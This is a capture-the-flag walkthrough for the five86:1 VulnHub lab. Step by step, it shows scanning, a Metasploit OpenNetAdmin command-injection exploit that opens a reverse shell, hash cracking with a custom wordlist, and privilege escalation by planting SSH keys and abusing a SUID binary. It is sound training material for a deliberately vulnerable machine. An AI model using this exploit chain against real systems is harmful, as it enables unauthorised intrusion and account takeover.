five86 1 walkthrough vulnhub ctf

Vulnhub CTF

Today we are solving five86: 1 is created by DCAUC and This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. five86 1 walkthrough

Download here five86: 1

Network Scanning

our first step is to identify the target IP address we will initiate with netdiscover.

netdiscover
five86 1 walkthrough

Nmap Aggressive scan. All port and services. and wee see target machine port 22 ssh, 80 http, 10000 Webmin httpd service is running

nmap -A 192.168.1.7
five86 1 walkthrough

Enumeration

enumerating port 80 http service we open the IP address in the web browser

we see the /ona directory look like openNetAdmin service is running I go to about page and we see the openNetAdmin version.

http://192.168.1.7/ona
five86 1 walkthrough

we go to exploit-db and search openNetAdmin v18.1.1 and I found a command injection exploit now I download the exploit our local system

five86 1 walkthrough

adding exploit msfconsole copy our exploit Download directory to Metasploit directory

cp /root/Downloads/47772.rb /usr/share/metasploit-framework/modules/exploits/
msfconsole
five86 1 walkthrough
use exploit/47772
set rhosts 192.168.1.7
set lhost 192.168.1.4
run

our session 1 is open and we got a reverse connection target machine

five86 1 walkthrough

The shell it gave was not proper so to fix that we run the Python One-Liner. As this machine was loaded with the Python3, we need to use the Python3 variant of the One-Liner. for proper shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'
id
five86 1 walkthrough

ls -lsa command to check all hidden file and directory and I open .htpasswd file

ls -lsa
cat .htpasswd
five86 1 walkthrough

Privilege Escalation

cat hash

Creating a wordlist using crunch and length is 10 and use target password character

crunch 10 10 aefhrt >word.txt
five86 1 walkthrough

Try to crack the hash file with john using our custom wordlist

john --wordlist=word.txt hash
five86 1 walkthrough

our hashes are crack now changing our shell www-data to user douglas and successfully login with douglas account.

su douglas

run sudo -l to check for commands that can run as sudo. It looks like dpkg can run as sudo.

sudo -l
five86 1 walkthrough

Generating an ssh key for our second user

ssh-keygen -b 2048

I copying this key target machine /tmp directory and changing name authorized_keys

cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
five86 1 walkthrough

After Creating key now changing the permission this file and copy our second user jen /home/jen/.ssh directory

cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/
five86 1 walkthrough

Try to connecting ssh connection without any password and us successfully login with Jen user

ssh [email protected]
five86 1 walkthrough

After try many directory enumeration I found a mail massage

cd /var/mail
ls
cat jen
five86 1 walkthrough

changing user Jen to the moss with the password found in the mail message

su moss
find /home -type f -perm -u=s 2>/dev/null
cd /home/moss/.games/
five86 1 walkthrough
./upyourgame
cd /root
cat flag.txt
five86 1 walkthrough
EnuBox Mattermost Walkthrough Vulnhub CTF

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →